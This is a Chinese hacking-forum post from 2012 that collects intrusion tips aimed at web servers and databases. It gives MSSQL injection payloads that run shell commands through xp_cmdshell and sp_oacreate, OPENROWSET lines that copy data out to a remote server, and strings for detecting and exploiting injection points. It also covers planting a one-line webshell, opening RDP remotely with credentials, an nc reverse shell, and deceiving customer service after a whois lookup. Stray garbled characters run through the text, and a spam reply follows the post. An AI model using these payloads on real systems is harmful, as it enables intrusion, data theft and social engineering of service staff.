找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3694|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
) d' f; C6 E9 |9 N" c) ?: `$ j6 N1 f/ v

% H/ p8 N( J: A& L0 }# SSA点数据库分离搞法+语句:: j3 z; }. D& k" {  R

  Q4 B3 ]4 E4 h. l% f: I% i/ O注射点不显错,执行下面三条语句页面都返回正常。# k' N, x* h+ a/ W# ]3 ~1 g
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')' N  B7 ^7 ~$ B. _" ?
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
! M( r+ x+ J# W( [8 pand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')1 U# G* L% s& b3 T8 U5 ?
可以列目录,判断系统为2000,web与数据库分离* v2 ?. m( m) }6 M
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。5 x: I0 o! `$ \& r3 j" `5 w. r
在注射点上执行; u. j1 K9 G! t; z4 ?$ v
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--) M. D7 g) ]; _, s5 G4 l
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP5 u* {3 X9 T* W  w6 u5 E5 Y- X5 P
还有我用NC监听得其他端口都没有得到IP。5 b1 h5 R' ]- G2 {2 U
9 I  Y5 M. i* i" P. F# s! C$ M# ~
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
+ d. y7 S: I& z- n4 e'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--4 N; }+ t6 R0 p* F
4 C9 N9 N' E/ W% ~
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
( G5 {1 w' v5 f) X9 i/ B8 a/ S4 Z% D3 c1 l4 M1 G' V* |- F6 x
现在就猜想是不是数据库是内网而且不能连外网。8 v1 J# ~; P0 J; O
2 h: L( l9 `% n
' k3 _: B- O: Z/ b) |9 d9 E
access导出txt文本代码4 n. ~* D3 w2 E# T+ {6 s/ X& R
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin- X0 G+ t7 B( A) Q  ^% I0 s. D; O

! o, D, ]# Y  }, d% d1 q+ K" B$ a; e: [9 `+ G: j' b
( N& k" s, M2 |4 ^% @& I
自动跳转到指定网站代码头/ e" G" R/ C0 z2 _! G9 l( a
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>* ?" E. A* L$ D4 f
3 G8 v5 B  \5 ?/ _

& A1 \8 s% A( a2 P' q$ o( J. }* l+ n入侵java or jsp站点时默认配置文件路径:) q* U0 ]. n  j
\web-inf\web.xml
$ d. s0 J2 R" j2 I- P2 S! s* ftomcat下的配置文件位置:5 J- i7 T0 n$ `- n# i' q
\conf\server.xml            (前面加上tomcat路径)
: M- x1 ^3 l6 e0 Z+ a  n\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
$ }8 }& z% m4 L) P  Y- w" n9 B* J3 Z! q: d+ v9 r: f
: ?9 o) Y+ o( s
5 L" @) W9 {  z# B% _
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
: U' k: }8 D( J5 S$ k-1%23  x& F* P2 {' C0 {/ r
> ; ^1 J% c- M3 v
<, t3 U9 c( M. Q  S6 a) e
1'+or+'1'='10 `3 P' ?* V! ?# }
id=8%bf
! w! _$ t: ?# ?! c% f+ y) u1 Z3 \. e1 S
全新注入点检测试法:! I4 b8 F& p! V8 E
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
( p& U, z% Y( t; _8 _6 m7 V$ r1 W: D- U, T+ G
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。9 n7 c, B- H3 K# z* z) e  T% o3 Z

; V3 ^# m6 ?, ^5 w: F6 l+ N搜索型注入判断方法:
3 w  b; V& n9 y9 }北京%' and '1'='1' and '%'='# h. q) J+ V/ `1 y
北京%' and '1'='2' and '%'='+ i" W% z- g) J& r$ q

1 s$ K+ P9 Y% J6 N
% K5 Z+ W4 H( \COOKIES注入:; k8 p/ a  |8 S

. b+ t. U' |* t3 L" E' H6 ~" f) Ejavascript:alert(document.cookie="id="+escape("51 and 1=1"));5 b  \6 Q4 H+ a" Q: T. P( `

: ]6 }1 U2 t( w" P$ U2000专业版查看本地登录用户命令:
: `  ~6 s  [3 Z- I5 e. ~& ^net config workstation
/ a: f) k/ F# E; {
0 R% |1 {% k* G5 y- G" ~. @8 I- `- ~  H1 K
2003下查看ipsec配置和默认防火墙配置命令:
* C# q  g/ u/ P& y- y3 fnetsh firewall show config
  \: M6 k3 S% D3 m/ u' ?1 Cnetsh ipsec static show all/ e+ p$ }! F9 s/ N" x) }

6 V/ e1 G1 n6 {: ?- _' G6 x" R不指派指定策略命令:
) R5 P6 D# |' E1 x( t: A4 X  D3 onetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)' K- D, j9 \; s" d  n; D
netsh ipsec static show policy all  显示策略名5 z8 R. a/ z$ }5 |

% H1 Q* n6 K" c# j6 e7 e5 ?; S3 u& l5 e% ?: E$ K/ l4 r7 I" e
猜管理员后台小技巧:7 j, ]8 [& N1 V4 S
admin/left.asp
9 r! L  Y3 K1 k# Kadmin/main.asp
0 `0 o& f& q$ t/ n9 U+ ladmin/top.asp7 y# O% g: c8 S0 n9 d" o; \( R
admin/admin.asp
: l; Z, f9 |8 r- m9 q) ^4 D8 W% \9 q会现出菜单导航,然后迅雷下载全部链接
- O7 U; i# ~& n6 Q8 z- o8 O$ p# V
# f, E4 n' S/ [% f% p. f5 s" G: z4 [6 q
社会工程学:! _, v4 R, K! j; p
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人# c" A* v) y# E1 Q3 p9 d
然后去骗客服
+ a' X/ d* I6 m* E8 B3 H$ \3 C- P6 {3 t4 K
2 Z% I/ a6 V9 o: K" L$ w" p
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: : d9 D7 o" y" a0 W5 K+ L/ o6 \
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 1 a: N( P5 [) g7 Y5 x
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
/ M9 P0 J+ A) g7 H) p0 @" R3 A8 G6 `2 [; t; F" o5 _

+ ^8 D) F; F  o* K9 w/ ]4 z. O7 r9 z% x" i
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
# m  ~/ }4 ?) I3 B" F1 i- J) s5 g- Q& B' C9 T
; o6 W8 T" K. m. E" m
0 p. @) I7 Q8 A( a+ G
CMD加密注册表位置1 |2 L$ L0 u3 ?
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor8 M% V( F: ]" ^
AutoRun
1 O. F5 j& {5 q  Y1 K. F, V# n- J% d6 o- W  L
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
2 `1 r1 a5 P% K. X  ZAutoRun
- q$ D- E8 _0 f9 ^5 i
- g7 k$ P4 \7 j* F2 v5 x: i& ?" s( s4 h% i1 @- o7 D
在找注入时搜索Hidden,把他改成test' l2 P) M" `! T' [( L% ~( G9 O

8 z2 m" p; b2 r( C6 h. U. M# `* s  d3 K7 G5 G
5 A9 |( j8 o! s: S/ N
mstsc /v:IP /console / Z/ Y" @5 H5 F

# [5 S9 t; r  U0 l* ]2 o- M
7 P! ?2 G" B  p& k7 A  Z" @一句话开3389:
' b, n5 [& h7 o( J- d5 {/ x0 K( s% `* ]! m! i
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  3 U- H0 L4 n: K: L* z' p9 I* A
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
8 f4 x% H' e- y( y0 Z' I
& }. K9 v( Y: |- i
, }) u0 i2 @4 Y6 K% Q/ O% K( Z! B7 b知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:0 y& ]: R1 i" C6 q$ q$ D. C
Insert into admin(user,pwd) values('test','test')
) |& |7 G; P1 ~2 Q/ Z3 g  K1 Y$ P. ^3 R) m/ I
8 |! y% a) N4 T. _/ l" P  F# _
NC反弹
% q* d/ u# ~4 w1 ^4 T* c先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
& L6 i+ B4 o1 Q$ C然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
' m5 ?1 ~/ \# r9 Y& P& b: t7 k0 h& c

% C9 `1 U' q1 ?5 I( }$ J) `在脚本入侵过程中要经常常试用%00来确认下参数是否有问题2 ^6 ]. `$ K# g/ O7 b* X

$ z7 u/ S/ m7 q有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
' W, t) c( E& q例如:2 c8 m. a% M! `. X; L8 a, Y
subst k: d:\www\ 用d盘www目录替代k盘
9 y% `$ j6 U' U" V. k- J! J! p- _subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表